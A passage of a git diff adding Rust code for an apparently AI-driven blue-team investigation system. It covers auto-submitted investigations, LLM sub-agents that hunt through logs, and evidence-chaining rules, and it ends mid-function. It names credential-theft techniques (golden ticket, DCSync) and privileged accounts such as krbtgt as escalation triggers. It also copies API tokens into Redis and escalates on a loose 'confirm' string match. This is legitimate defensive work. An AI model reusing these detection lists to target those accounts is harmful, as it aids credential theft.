+//! +//! When `ARES_BLUE_ENABLED=1`, this background task watches for red team +//! findings and automatically submits investigation requests to the +//! `ares:blue:investigations` queue. Without this, the blue orchestrator +//! polls an empty queue forever — investigation requests must be pushed +//! explicitly (via CLI) or auto-submitted (this module). + +use std::sync::Arc; +use std::time::Duration; + +use anyhow::Result; +use chrono::Utc; +use redis::AsyncCommands; +use tokio::sync::watch; +use tracing::{info, warn}; + +use crate::orchestrator::config::OrchestratorConfig; +use crate::orchestrator::state::SharedState; +use crate::orchestrator::task_queue::TaskQueue; + +/// Minimum red team activity before submitting a blue investigation. +const MIN_CREDENTIALS: usize = 1; +const MIN_HOSTS: usize = 2; + +/// How long to wait after orchestrator start before first check. +const INITIAL_DELAY_SECS: u64 = 90; + +/// How often to check if a new investigation should be submitted. +const CHECK_INTERVAL_SECS: u64 = 30; + +/// Collect env vars that blue tools need (Grafana, Loki, etc.). +fn collect_blue_env_vars() -> std::collections::HashMap { + const NAMES: &[&str] = &[ + "OPENAI_API_KEY", + "ANTHROPIC_API_KEY", + "GRAFANA_SERVICE_ACCOUNT_TOKEN", + "GRAFANA_URL", + "LOKI_URL", + "LOKI_AUTH_TOKEN", + "PROMETHEUS_URL", + ]; + let mut map = std::collections::HashMap::new(); + for name in NAMES { + if let Ok(val) = std::env::var(name) { + if !val.is_empty() { + map.insert(name.to_string(), val); + } + } + } + map +} + +/// Spawn the blue auto-submit task as a background tokio task. 
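+///
+/// Exits after the first successful submission, so each orchestrator run
+/// produces at most one auto-submitted investigation (see `auto_submit_loop`).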
+pub fn spawn_blue_auto_submit( + queue: TaskQueue, + shared_state: SharedState, + config: Arc, + model_spec: String, + shutdown_rx: watch::Receiver, +) -> tokio::task::JoinHandle<()> { + tokio::spawn(async move { + if let Err(e) = auto_submit_loop(queue, shared_state, config, model_spec, shutdown_rx).await + { + warn!("Blue auto-submit exited with error: {e}"); + } + }) +} + +async fn auto_submit_loop( + queue: TaskQueue, + shared_state: SharedState, + config: Arc, + model_spec: String, + mut shutdown_rx: watch::Receiver, +) -> Result<()> { + info!("Blue auto-submit: waiting {INITIAL_DELAY_SECS}s for red team activity"); + + // Wait for initial red team activity + tokio::select! { + _ = tokio::time::sleep(Duration::from_secs(INITIAL_DELAY_SECS)) => {} + _ = shutdown_rx.changed() => return Ok(()), + } + + let mut submitted = false; + + loop { + if *shutdown_rx.borrow() { + break; + } + + if !submitted { + let state = shared_state.read().await; + let cred_count = state.credentials.len(); + let host_count = state.hosts.len(); + let vuln_count = state.discovered_vulnerabilities.len(); + let has_enough = cred_count >= MIN_CREDENTIALS || host_count >= MIN_HOSTS; + drop(state); + + if has_enough { + info!( + credentials = cred_count, + hosts = host_count, + vulns = vuln_count, + "Blue auto-submit: red team has enough findings, submitting investigation" + ); + + match submit_investigation(&queue, &shared_state, &config, &model_spec).await { + Ok(inv_id) => { + info!( + investigation_id = %inv_id, + operation_id = %config.operation_id, + "Blue auto-submit: investigation queued" + ); + submitted = true; + } + Err(e) => { + warn!("Blue auto-submit: failed to submit investigation: {e}"); + } + } + } + } + + if submitted { + // Done — exit the loop + break; + } + + tokio::select! { + _ = tokio::time::sleep(Duration::from_secs(CHECK_INTERVAL_SECS)) => {} + _ = shutdown_rx.changed() => break, + } + } + + info!("Blue auto-submit task finished"); + Ok(()) +} + +/// Build and submit a blue investigation request from the current red team state. 
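+///
+/// Returns the generated investigation ID, shaped `inv-%Y%m%d-%H%M%S`
+/// (e.g. `inv-20250101-120000`; illustrative timestamp).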
+async fn submit_investigation(
+    queue: &TaskQueue,
+    shared_state: &SharedState,
+    config: &OrchestratorConfig,
+    model_spec: &str,
+) -> Result<String> {
+    let state = shared_state.read().await;
+    let now = Utc::now();
+
+    let op_id = &config.operation_id;
+    let inv_id = format!("inv-{}", now.format("%Y%m%d-%H%M%S"));
+
+    // Collect target data from state
+    let target_ips: Vec<String> = state.hosts.iter().map(|h| h.ip.clone()).collect();
+    let target_users: Vec<String> = state
+        .credentials
+        .iter()
+        .map(|c| c.username.clone())
+        .collect();
+    let cred_count = state.credentials.len();
+    let host_count = state.hosts.len();
+    let vuln_count = state.discovered_vulnerabilities.len();
+    let domains: Vec<String> = state.domains.clone();
+
+    // Collect MITRE techniques from timeline if available
+    let techniques: Vec<String> = Vec::new(); // Timeline techniques would need Redis lookup
+
+    drop(state);
+
+    let grafana_url = std::env::var("GRAFANA_URL").ok();
+    let grafana_token = std::env::var("GRAFANA_SERVICE_ACCOUNT_TOKEN").ok();
+
+    // Build synthetic alert (mirrors ares-cli blue from-operation)
+    let operation_context = serde_json::json!({
+        "operation_id": op_id,
+        "attack_window_start": now.to_rfc3339(),
+        "attack_window_end": now.to_rfc3339(),
+        "techniques_used": techniques,
+        "domains": domains,
+    });
+
+    let alert = serde_json::json!({
+        "labels": {
+            "alertname": format!("RedTeamOperation_{op_id}"),
+            "severity": "critical",
+            "source": "ares-red-team",
+        },
+        "annotations": {
+            "summary": format!(
+                "Red team operation {op_id} - {cred_count} credentials, {host_count} hosts, {vuln_count} vulnerabilities",
+            ),
+            "description": format!(
+                "Investigate blue team detection coverage for red team operation {op_id}. \
+                 Operation is in progress.",
+            ),
+        },
+        "operation_context": operation_context,
+        "startsAt": now.to_rfc3339(),
+        "target_ips": &target_ips[..std::cmp::min(target_ips.len(), 50)],
+        "target_users": &target_users[..std::cmp::min(target_users.len(), 50)],
+    });
+
+    // Strip provider prefix for the model name (blue runner does this too)
+    let model = model_spec
+        .split_once('/')
+        .map(|(_, name)| name)
+        .unwrap_or(model_spec);
+
+    let request = serde_json::json!({
+        "investigation_id": inv_id,
+        "alert": alert,
+        "correlation_context": null,
+        "model": model,
+        "max_steps": 75,
+        "multi_agent": true,
+        "auto_route": false,
+        "report_dir": null,
+        "operation_id": op_id,
+        "grafana_url": grafana_url,
+        "grafana_api_key": grafana_token,
+        "submitted_at": now.to_rfc3339(),
+    });
+
+    let mut conn = queue.connection();
+
+    // Store env vars for the investigation (blue tools read these from Redis)
+    let env_vars = collect_blue_env_vars();
+    if !env_vars.is_empty() {
+        let env_key = format!("ares:blue:inv:{inv_id}:env_vars");
+        let env_json = serde_json::to_string(&env_vars)?;
+        let _: () = conn.set(&env_key, &env_json).await?;
+        let _: () = conn.expire(&env_key, 3600).await?;
+    }
+
+    // Push to investigation queue
+    let request_json = serde_json::to_string(&request)?;
+    let _: () = conn
+        .rpush("ares:blue:investigations", &request_json)
+        .await?;
+
+    // Track investigation against operation
+    let op_inv_key = format!("ares:blue:op:{op_id}:investigations");
+    let _: () = conn.sadd(&op_inv_key, &inv_id).await?;
+    let _: () = conn.expire(&op_inv_key, 7 * 24 * 3600).await?;
+
+    Ok(inv_id)
+}
diff --git a/ares-cli/src/orchestrator/blue/callbacks.rs b/ares-cli/src/orchestrator/blue/callbacks.rs
new file mode 100644
index 00000000..5020ae3a
--- /dev/null
+++ b/ares-cli/src/orchestrator/blue/callbacks.rs
@@ -0,0 +1,621 @@
+//! Blue team callback handler for orchestrator dispatch and query tools.
+//!
+//! Implements `CallbackHandler` to handle:
+//! - **Dispatch tools** — `dispatch_triage`, `dispatch_threat_hunt`,
+//!   `dispatch_lateral_analysis` run sub-agent loops inline and return results.
+//! - **Query tools** — `get_investigation_status`, `get_task_result`,
+//!   `wait_for_all_tasks` read from Redis investigation state.
+//! - **Completion callbacks** — `complete_investigation`, `escalate_investigation`,
+//!   `triage_complete`, etc. signal investigation lifecycle transitions.
+
+use std::sync::Arc;
+
+use anyhow::Result;
+use tracing::{info, warn};
+
+use ares_llm::agent_loop::CallbackResult;
+use ares_llm::tool_registry::blue::{self, BlueAgentRole};
+use ares_llm::{
+    run_agent_loop, AgentLoopConfig, CallbackHandler, LlmProvider, TokenUsage, ToolCall,
+    ToolDispatcher,
+};
+
+use super::sub_agent::{BlueToolDispatcher, SubAgentCallbackHandler};
+
+/// All tool names this handler recognizes as callbacks.
+pub(super) const BLUE_HANDLED_TOOLS: &[&str] = &[
+    // Dispatch tools (run sub-agent loops)
+    "dispatch_triage",
+    "dispatch_threat_hunt",
+    "dispatch_lateral_analysis",
+    // Query tools
+    "get_investigation_status",
+    "get_task_result",
+    "wait_for_all_tasks",
+    // Completion/lifecycle callbacks
+    "triage_complete",
+    "hunt_complete",
+    "lateral_complete",
+    "complete_investigation",
+    "escalate_investigation",
+    "confirm_escalation",
+    "downgrade_escalation",
+    "request_reinvestigation",
+    "route_to_team",
+];
+
+/// Blue team callback handler for the orchestrator agent.
+///
+/// Created per-investigation, holds references needed to run sub-agent loops
+/// and query investigation state.
+pub struct BlueCallbackHandler {
+    provider: Arc<dyn LlmProvider>,
+    dispatcher: Arc<dyn ToolDispatcher>,
+    model: String,
+    investigation_id: String,
+    alert: serde_json::Value,
+    redis_url: String,
+}
+
+impl BlueCallbackHandler {
+    pub fn new(
+        provider: Arc<dyn LlmProvider>,
+        dispatcher: Arc<dyn ToolDispatcher>,
+        model: String,
+        investigation_id: String,
+        alert: serde_json::Value,
+        redis_url: String,
+    ) -> Self {
+        Self {
+            provider,
+            dispatcher,
+            model,
+            investigation_id,
+            alert,
+            redis_url,
+        }
+    }
+
+    /// Run a sub-agent loop for a blue team role and return the result text.
+    async fn run_sub_agent(&self, role: BlueAgentRole, task_prompt: &str) -> Result<String> {
+        let tools = blue::blue_tools_for_role(role);
+        let capabilities: Vec<String> = tools
+            .iter()
+            .filter(|t| !blue::is_blue_callback_tool(&t.name))
+            .map(|t| t.name.clone())
+            .collect();
+
+        let system_prompt =
+            ares_llm::prompt::blue::build_blue_system_prompt(role.as_str(), &capabilities)?;
+
+        let config = AgentLoopConfig {
+            model: self.model.clone(),
+            max_steps: 50,
+            max_tool_calls_per_name: 25,
+            ..AgentLoopConfig::default()
+        };
+
+        // Wrap the dispatcher so blue tools (add_evidence, add_technique, etc.)
+        // are executed locally via dispatch_blue() instead of going through
+        // the red-team dispatcher which doesn't know about them.
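+        // (Both wrapper types live in super::sub_agent; non-blue tool calls
+        // presumably still delegate to the wrapped red-team dispatcher.)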
+ let blue_dispatcher: Arc = Arc::new(BlueToolDispatcher { + inner: Arc::clone(&self.dispatcher), + }); + + let sub_agent_cb: Arc = Arc::new(SubAgentCallbackHandler { + investigation_id: self.investigation_id.clone(), + redis_url: self.redis_url.clone(), + }); + + let outcome = run_agent_loop( + self.provider.as_ref(), + blue_dispatcher, + &config, + &system_prompt, + task_prompt, + role.as_str(), + &self.investigation_id, + &tools, + Some(sub_agent_cb), + ) + .await; + + // Extract result text from the outcome + let result = match &outcome.reason { + ares_llm::LoopEndReason::TaskComplete { result, .. } => result.clone(), + ares_llm::LoopEndReason::EndTurn { content } => content.clone(), + ares_llm::LoopEndReason::RequestAssistance { issue, context } => { + format!("Sub-agent requested assistance: {issue}. Context: {context}") + } + ares_llm::LoopEndReason::MaxSteps => { + format!("Sub-agent hit max steps ({} steps)", outcome.steps) + } + ares_llm::LoopEndReason::MaxTokens => "Sub-agent hit max tokens".to_string(), + ares_llm::LoopEndReason::Error(e) => format!("Sub-agent error: {e}"), + }; + + Ok(result) + } + + /// Dispatch triage sub-agent. + async fn dispatch_triage(&self, _call: &ToolCall) -> Result { + info!( + investigation_id = %self.investigation_id, + "Dispatching triage sub-agent" + ); + + let alert_summary = serde_json::to_string_pretty(&self.alert).unwrap_or_default(); + let task_prompt = format!( + "You are triaging alert for investigation {}.\n\n\ + Alert data:\n{}\n\n\ + Analyze this alert. Determine severity, identify key indicators of compromise, \ + and recommend whether this needs deeper investigation. Use the available Loki \ + query tools to examine relevant logs around the alert timeframe.", + self.investigation_id, alert_summary + ); + + let result = self + .run_sub_agent(BlueAgentRole::Triage, &task_prompt) + .await?; + info!( + investigation_id = %self.investigation_id, + "Triage sub-agent completed" + ); + Ok(CallbackResult::Continue(format!( + "Triage result:\n{result}" + ))) + } + + /// Dispatch threat hunt sub-agent. + async fn dispatch_threat_hunt(&self, call: &ToolCall) -> Result { + let technique_id = call.arguments["technique_id"].as_str().unwrap_or("unknown"); + let detection_method = call.arguments["detection_method"] + .as_str() + .unwrap_or("log_analysis"); + let hostname = call.arguments["hostname"].as_str().unwrap_or(""); + let username = call.arguments["username"].as_str().unwrap_or(""); + let context = call.arguments["context"].as_str().unwrap_or(""); + + info!( + investigation_id = %self.investigation_id, + technique_id = technique_id, + "Dispatching threat hunt sub-agent" + ); + + let mut task_prompt = format!( + "You are hunting for MITRE ATT&CK technique {} in investigation {}.\n\ + Detection method: {}\n", + technique_id, self.investigation_id, detection_method + ); + if !hostname.is_empty() { + task_prompt.push_str(&format!("Target host: {hostname}\n")); + } + if !username.is_empty() { + task_prompt.push_str(&format!("Target user: {username}\n")); + } + if !context.is_empty() { + task_prompt.push_str(&format!("Context: {context}\n")); + } + task_prompt.push_str( + "\nUse the available Loki query tools to search for evidence of this technique. 
\ + Look for relevant log patterns, authentication events, process execution, \ + and lateral movement indicators.", + ); + + let result = self + .run_sub_agent(BlueAgentRole::ThreatHunter, &task_prompt) + .await?; + info!( + investigation_id = %self.investigation_id, + technique_id = technique_id, + "Threat hunt sub-agent completed" + ); + Ok(CallbackResult::Continue(format!( + "Threat hunt result ({technique_id}):\n{result}" + ))) + } + + /// Dispatch lateral analysis sub-agent. + async fn dispatch_lateral_analysis(&self, call: &ToolCall) -> Result { + let focus_host = call.arguments["focus_host"].as_str().unwrap_or("unknown"); + let focus_user = call.arguments["focus_user"].as_str().unwrap_or(""); + let context = call.arguments["context"].as_str().unwrap_or(""); + + info!( + investigation_id = %self.investigation_id, + focus_host = focus_host, + "Dispatching lateral analysis sub-agent" + ); + + let mut task_prompt = format!( + "You are analyzing lateral movement patterns in investigation {}.\n\ + Primary host: {}\n", + self.investigation_id, focus_host + ); + if !focus_user.is_empty() { + task_prompt.push_str(&format!("Primary user: {focus_user}\n")); + } + if !context.is_empty() { + task_prompt.push_str(&format!("Context: {context}\n")); + } + task_prompt.push_str( + "\nUse the available Loki query tools to trace authentication patterns, \ + SMB/WinRM/RDP connections, and credential usage across hosts. Map the \ + lateral movement path and identify compromised accounts.", + ); + + let result = self + .run_sub_agent(BlueAgentRole::LateralAnalyst, &task_prompt) + .await?; + info!( + investigation_id = %self.investigation_id, + focus_host = focus_host, + "Lateral analysis sub-agent completed" + ); + Ok(CallbackResult::Continue(format!( + "Lateral analysis result:\n{result}" + ))) + } + + /// Dispatch escalation triage sub-agent. + /// + /// Instead of immediately returning `RequestAssistance`, we launch an + /// `EscalationTriage` sub-agent that reviews the investigation context and + /// decides whether to confirm, downgrade, reinvestigate, or route. + async fn dispatch_escalation_triage(&self, call: &ToolCall) -> Result { + let reason = call.arguments["reason"].as_str().unwrap_or("unknown"); + let severity = call.arguments["severity"].as_str().unwrap_or("high"); + + info!( + investigation_id = %self.investigation_id, + severity = severity, + reason = reason, + "Dispatching escalation triage sub-agent" + ); + + let task_prompt = format!( + "You are performing escalation triage for investigation {}.\n\n\ + Escalation reason: {}\n\ + Severity: {}\n\n\ + Review the full investigation context using get_investigation_context. \ + Then make ONE of these decisions:\n\ + 1. confirm_escalation — if the evidence warrants human review\n\ + 2. downgrade_escalation — if this is a false positive or low severity\n\ + 3. request_reinvestigation — if more evidence is needed before deciding\n\ + 4. route_to_team — if a specialist team should handle this\n\n\ + Be decisive. Evaluate the evidence quality, technique severity, and \ + scope of compromise before making your decision.", + self.investigation_id, reason, severity + ); + + let result = self + .run_sub_agent(BlueAgentRole::EscalationTriage, &task_prompt) + .await?; + + info!( + investigation_id = %self.investigation_id, + "Escalation triage sub-agent completed" + ); + + // If the triage confirmed escalation, propagate as RequestAssistance + // so the orchestrator loop terminates with escalated status. 
+ // Otherwise return the triage decision as a Continue so the orchestrator + // can incorporate the finding (e.g., downgrade → complete investigation). + let lower = result.to_lowercase(); + if lower.contains("escalation confirmed") || lower.contains("confirm") { + Ok(CallbackResult::RequestAssistance { + issue: format!("Escalation confirmed by triage ({severity}): {reason}"), + context: result, + }) + } else { + Ok(CallbackResult::Continue(format!( + "Escalation triage result:\n{result}" + ))) + } + } + + /// Handle query tools that read investigation state from Redis. + async fn handle_query_tool(&self, call: &ToolCall) -> Result { + match call.name.as_str() { + "get_investigation_status" => { + let reader = ares_core::state::BlueStateReader::new(self.investigation_id.clone()); + let mut conn = redis::Client::open(self.redis_url.as_str())? + .get_connection_manager() + .await?; + match reader.load_state(&mut conn).await? { + Some(state) => { + let mut summary = format!( + "Investigation: {}\nStage: {:?}\n", + self.investigation_id, state.stage + ); + if !state.evidence.is_empty() { + summary + .push_str(&format!("Evidence items: {}\n", state.evidence.len())); + for (i, ev) in state.evidence.iter().enumerate().take(10) { + summary.push_str(&format!( + " {}. [{}] {}\n", + i + 1, + ev.evidence_type, + ev.value + )); + } + } + if !state.timeline.is_empty() { + summary + .push_str(&format!("Timeline events: {}\n", state.timeline.len())); + } + Ok(CallbackResult::Continue(summary)) + } + None => Ok(CallbackResult::Continue( + "Investigation state not yet initialized.".to_string(), + )), + } + } + "get_task_result" => { + let task_id = call.arguments["task_id"].as_str().unwrap_or("unknown"); + Ok(CallbackResult::Continue(format!( + "Task {task_id} result lookup not yet implemented — \ + sub-agent results are returned inline from dispatch tools." + ))) + } + "wait_for_all_tasks" => { + // In the inline dispatch model, tasks complete synchronously + Ok(CallbackResult::Continue( + "All dispatched tasks have completed (inline execution).".to_string(), + )) + } + _ => Ok(CallbackResult::Continue(format!( + "Unknown query tool: {}", + call.name + ))), + } + } + + /// Handle completion/lifecycle callbacks. + pub(super) fn handle_lifecycle_callback(call: &ToolCall) -> Option { + match call.name.as_str() { + "triage_complete" => { + let severity = call.arguments["severity"].as_str().unwrap_or("unknown"); + let summary = call.arguments["summary"].as_str().unwrap_or(""); + let escalate = call.arguments["escalate"].as_bool().unwrap_or(false); + let result = + format!("Triage complete: severity={severity}, escalate={escalate}. {summary}"); + Some(CallbackResult::TaskComplete { + task_id: "triage".into(), + result, + }) + } + "hunt_complete" => { + let findings = call.arguments["findings"].as_str().unwrap_or(""); + let confidence = call.arguments["confidence"].as_str().unwrap_or("medium"); + let result = format!("Hunt complete (confidence: {confidence}): {findings}"); + Some(CallbackResult::TaskComplete { + task_id: "threat_hunt".into(), + result, + }) + } + "lateral_complete" => { + let connections = call.arguments["connections_found"].as_u64().unwrap_or(0); + let summary = call.arguments["summary"].as_str().unwrap_or(""); + let result = + format!("Lateral analysis: {connections} connections found. 
{summary}"); + Some(CallbackResult::TaskComplete { + task_id: "lateral_analysis".into(), + result, + }) + } + "complete_investigation" => { + let summary = call.arguments["summary"].as_str().unwrap_or(""); + let result = format!("Investigation complete. {summary}"); + Some(CallbackResult::TaskComplete { + task_id: "investigation".into(), + result: result.to_string(), + }) + } + // escalate_investigation is handled async in dispatch_escalation_triage + "confirm_escalation" => { + let action = call.arguments["action"].as_str().unwrap_or("escalate"); + Some(CallbackResult::TaskComplete { + task_id: "escalation_triage".into(), + result: format!("Escalation confirmed: {action}"), + }) + } + "downgrade_escalation" => { + let reason = call.arguments["reason"].as_str().unwrap_or(""); + Some(CallbackResult::TaskComplete { + task_id: "escalation_triage".into(), + result: format!("Escalation downgraded: {reason}"), + }) + } + "request_reinvestigation" => { + let focus = call.arguments["focus"].as_str().unwrap_or(""); + Some(CallbackResult::Continue(format!( + "Reinvestigation queued with focus: {focus}" + ))) + } + "route_to_team" => { + let team = call.arguments["team"].as_str().unwrap_or("soc"); + let priority = call.arguments["priority"].as_str().unwrap_or("medium"); + Some(CallbackResult::TaskComplete { + task_id: "routing".into(), + result: format!("Routed to {team} team (priority: {priority})"), + }) + } + _ => None, + } + } +} + +#[async_trait::async_trait] +impl CallbackHandler for BlueCallbackHandler { + fn is_callback(&self, tool_name: &str) -> bool { + BLUE_HANDLED_TOOLS.contains(&tool_name) + } + + async fn handle_callback(&self, call: &ToolCall) -> Option> { + match call.name.as_str() { + // Dispatch tools — run sub-agent loops + "dispatch_triage" => Some(self.dispatch_triage(call).await), + "dispatch_threat_hunt" => Some(self.dispatch_threat_hunt(call).await), + "dispatch_lateral_analysis" => Some(self.dispatch_lateral_analysis(call).await), + + // Escalation — launches escalation triage sub-agent + "escalate_investigation" => Some(self.dispatch_escalation_triage(call).await), + + // Query tools + "get_investigation_status" | "get_task_result" | "wait_for_all_tasks" => { + Some(self.handle_query_tool(call).await) + } + + // Lifecycle callbacks + _ => Self::handle_lifecycle_callback(call).map(Ok), + } + } + + async fn on_token_usage(&self, usage: &TokenUsage, model: &str) { + if usage.input_tokens == 0 && usage.output_tokens == 0 { + return; + } + if let Ok(client) = redis::Client::open(self.redis_url.as_str()) { + if let Ok(mut conn) = client.get_connection_manager().await { + if let Err(e) = ares_core::token_usage::increment_blue_token_usage( + &mut conn, + &self.investigation_id, + usage.input_tokens.into(), + usage.output_tokens.into(), + model, + ) + .await + { + warn!(err = %e, "Failed to record blue token usage"); + } + } + } + } +} + +#[cfg(test)] +mod tests { + use super::*; + use serde_json::json; + + #[test] + fn test_is_callback() { + let handler = BlueCallbackHandler { + provider: Arc::new(MockProvider), + dispatcher: Arc::new(MockDispatcher), + model: "test".into(), + investigation_id: "inv-test".into(), + alert: json!({}), + redis_url: "redis://localhost".into(), + }; + + assert!(handler.is_callback("dispatch_triage")); + assert!(handler.is_callback("dispatch_threat_hunt")); + assert!(handler.is_callback("dispatch_lateral_analysis")); + assert!(handler.is_callback("complete_investigation")); + assert!(handler.is_callback("escalate_investigation")); + 
diff --git a/ares-cli/src/orchestrator/blue/chaining.rs b/ares-cli/src/orchestrator/blue/chaining.rs
new file mode 100644
index 00000000..98138642
--- /dev/null
+++ b/ares-cli/src/orchestrator/blue/chaining.rs
@@ -0,0 +1,598 @@
+//! Evidence auto-chaining for blue team investigations.
+//!
+//! When a task result contains evidence of certain types, this module
+//! automatically spawns follow-up investigation tasks. This mirrors
+//! the Python `EVIDENCE_CHAIN_MAP` / `_process_result_chains` logic
+//! in `result_processing.py`.
+
+use std::collections::{HashMap, HashSet};
+use std::sync::LazyLock;
+
+use anyhow::Result;
+use chrono::Utc;
+use serde_json::Value;
+use tracing::{debug, info};
+
+use ares_core::state::blue_task_queue::{BlueTaskMessage, BlueTaskQueue, BlueTaskResult};
+use ares_llm::tool_registry::blue::BlueAgentRole;
+
+// ── Static configuration ───────────────────────────────────────────
+
+/// Follow-up action descriptor produced by evidence chaining.
+#[derive(Debug, Clone)]
+struct ChainAction {
+    /// Task type to dispatch (e.g. `"threat_hunt"`, `"lateral_analysis"`).
+    task_type: &'static str,
+    /// Worker role that handles this task type.
+    role: BlueAgentRole,
+    /// Human-readable description embedded in the task params.
+    focus: &'static str,
+}
+
+/// Evidence type to follow-up actions mapping.
+///
+/// When a task result contains an evidence type key, the corresponding
+/// actions are dispatched as follow-up sub-tasks (subject to dedup).
+static EVIDENCE_CHAIN_MAP: LazyLock<HashMap<&'static str, Vec<ChainAction>>> =
+    LazyLock::new(|| {
+        let mut m = HashMap::new();
+
+        m.insert(
+            "suspicious_ip",
+            vec![ChainAction {
+                task_type: "threat_hunt",
+                role: BlueAgentRole::ThreatHunter,
+                focus: "IP correlation analysis",
+            }],
+        );
+
+        m.insert(
+            "malicious_process",
+            vec![ChainAction {
+                task_type: "threat_hunt",
+                role: BlueAgentRole::ThreatHunter,
+                focus: "process ancestry and execution chain analysis",
+            }],
+        );
+
+        m.insert(
+            "lateral_movement",
+            vec![ChainAction {
+                task_type: "lateral_analysis",
+                role: BlueAgentRole::LateralAnalyst,
+                focus: "lateral movement path reconstruction",
+            }],
+        );
+
+        m.insert(
+            "credential_access",
+            vec![ChainAction {
+                task_type: "threat_hunt",
+                role: BlueAgentRole::ThreatHunter,
+                focus: "credential abuse pattern detection",
+            }],
+        );
+
+        m.insert(
+            "persistence_mechanism",
+            vec![ChainAction {
+                task_type: "threat_hunt",
+                role: BlueAgentRole::ThreatHunter,
+                focus: "persistence indicator sweep",
+            }],
+        );
+
+        m.insert(
+            "c2_communication",
+            vec![ChainAction {
+                task_type: "threat_hunt",
+                role: BlueAgentRole::ThreatHunter,
+                focus: "network IOC and C2 beacon analysis",
+            }],
+        );
+
+        m.insert(
+            "privilege_escalation",
+            vec![
+                ChainAction {
+                    task_type: "lateral_analysis",
+                    role: BlueAgentRole::LateralAnalyst,
+                    focus: "post-escalation lateral movement assessment",
+                },
+                ChainAction {
+                    task_type: "threat_hunt",
+                    role: BlueAgentRole::ThreatHunter,
+                    focus: "privilege escalation technique detection",
+                },
+            ],
+        );
+
+        m
+    });
+
+/// Users whose appearance in results triggers automatic escalation.
+static CRITICAL_USERS: LazyLock<HashSet<&'static str>> = LazyLock::new(|| {
+    let mut s = HashSet::new();
+    s.insert("krbtgt");
+    s.insert("administrator");
+    s.insert("domain admins");
+    s.insert("enterprise admins");
+    s.insert("schema admins");
+    s
+});
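Editor's note: the dedup key format (`"{evidence_type}:{task_type}"`) and the map lookup are the whole chaining mechanism. A self-contained sketch of the pattern with a toy map, showing that a repeated evidence type dispatches each follow-up only once:

```rust
use std::collections::{HashMap, HashSet};

fn main() {
    // Toy chain map: evidence type -> follow-up task types.
    let chain_map: HashMap<&str, Vec<&str>> = HashMap::from([
        ("privilege_escalation", vec!["lateral_analysis", "threat_hunt"]),
        ("suspicious_ip", vec!["threat_hunt"]),
    ]);

    let mut dispatched: HashSet<String> = HashSet::new();

    // The same evidence type arriving twice only dispatches once per task type.
    for ev_type in ["privilege_escalation", "privilege_escalation"] {
        for task_type in chain_map.get(ev_type).into_iter().flatten() {
            let dedup_key = format!("{ev_type}:{task_type}");
            if dispatched.insert(dedup_key.clone()) {
                println!("dispatch {dedup_key}");
            }
        }
    }
    // Prints exactly two lines:
    //   dispatch privilege_escalation:lateral_analysis
    //   dispatch privilege_escalation:threat_hunt
}
```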
+// ── Public API ──────────────────────────────────────────────────────
+
+/// Process a completed task result and dispatch any follow-up tasks
+/// dictated by the evidence chain map.
+///
+/// Returns the list of newly dispatched task IDs (may be empty).
+///
+/// `dispatched_chains` is the per-investigation dedup set: each entry
+/// is `"{evidence_type}:{task_type}"`. The caller must persist this
+/// set across calls for the same investigation.
+pub async fn process_task_result(
+    result: &BlueTaskResult,
+    task_queue: &mut BlueTaskQueue,
+    investigation_id: &str,
+    dispatched_chains: &mut HashSet<String>,
+) -> Result<Vec<String>> {
+    let payload = match (&result.success, &result.result) {
+        (true, Some(val)) => val,
+        _ => return Ok(Vec::new()),
+    };
+
+    let mut new_task_ids = Vec::new();
+
+    // 1. Extract evidence types from the result payload.
+    let evidence_types = extract_evidence_types(payload);
+
+    for ev_type in &evidence_types {
+        if let Some(actions) = EVIDENCE_CHAIN_MAP.get(ev_type.as_str()) {
+            for action in actions {
+                let dedup_key = format!("{ev_type}:{}", action.task_type);
+                if dispatched_chains.contains(&dedup_key) {
+                    debug!(
+                        investigation_id,
+                        evidence_type = ev_type.as_str(),
+                        task_type = action.task_type,
+                        "Skipping duplicate chain dispatch"
+                    );
+                    continue;
+                }
+
+                let task_id =
+                    dispatch_chain_task(task_queue, investigation_id, action, ev_type).await?;
+
+                dispatched_chains.insert(dedup_key);
+                new_task_ids.push(task_id);
+            }
+        }
+    }
+
+    // 2. Check for critical user escalation.
+    if let Some(reason) = should_escalate(result) {
+        let escalation_dedup = "escalation:critical_user".to_string();
+        if !dispatched_chains.contains(&escalation_dedup) {
+            info!(
+                investigation_id,
+                reason = reason.as_str(),
+                "Auto-escalating: critical user detected"
+            );
+
+            // Dispatch both golden ticket detection and DCSync detection.
+            for (task_type, focus) in [
+                (
+                    "threat_hunt",
+                    "golden ticket detection for critical user activity",
+                ),
+                ("threat_hunt", "DCSync detection for critical user activity"),
+            ] {
+                let sub_dedup = format!("escalation:{task_type}:{focus}");
+                if dispatched_chains.contains(&sub_dedup) {
+                    continue;
+                }
+
+                let action = ChainAction {
+                    task_type,
+                    role: BlueAgentRole::ThreatHunter,
+                    focus,
+                };
+                let task_id =
+                    dispatch_chain_task(task_queue, investigation_id, &action, "critical_user")
+                        .await?;
+                dispatched_chains.insert(sub_dedup);
+                new_task_ids.push(task_id);
+            }
+
+            dispatched_chains.insert(escalation_dedup);
+        }
+    }
+
+    if !new_task_ids.is_empty() {
+        info!(
+            investigation_id,
+            count = new_task_ids.len(),
+            task_ids = ?new_task_ids,
+            "Auto-chained follow-up tasks"
+        );
+    }
+
+    Ok(new_task_ids)
+}
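Editor's note: the doc comment above puts the burden of persisting `dispatched_chains` on the caller. One hypothetical way a caller might keep a dedup set per investigation — names here are illustrative, not from the patch:

```rust
use std::collections::{HashMap, HashSet};

/// Hypothetical registry keeping one dedup set per investigation so
/// repeated result processing never re-dispatches the same chain.
#[derive(Default)]
struct ChainRegistry {
    per_investigation: HashMap<String, HashSet<String>>,
}

impl ChainRegistry {
    /// Returns true the first time an (evidence_type, task_type) pair is seen
    /// for this investigation.
    fn try_dispatch(&mut self, investigation_id: &str, evidence_type: &str, task_type: &str) -> bool {
        self.per_investigation
            .entry(investigation_id.to_string())
            .or_default()
            .insert(format!("{evidence_type}:{task_type}"))
    }
}

fn main() {
    let mut registry = ChainRegistry::default();
    assert!(registry.try_dispatch("inv-1", "suspicious_ip", "threat_hunt"));
    assert!(!registry.try_dispatch("inv-1", "suspicious_ip", "threat_hunt")); // deduped
    assert!(registry.try_dispatch("inv-2", "suspicious_ip", "threat_hunt")); // new investigation
}
```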
+/// Check whether a task result warrants automatic escalation.
+///
+/// Returns `Some(reason)` if escalation is warranted, `None` otherwise.
+pub fn should_escalate(result: &BlueTaskResult) -> Option<String> {
+    let payload = result.result.as_ref()?;
+
+    // Check users_investigated array for critical user names.
+    if let Some(users) = payload.get("users_investigated").and_then(|v| v.as_array()) {
+        for user in users {
+            if let Some(name) = user.as_str() {
+                let lower = name.to_lowercase();
+                let trimmed = lower.trim();
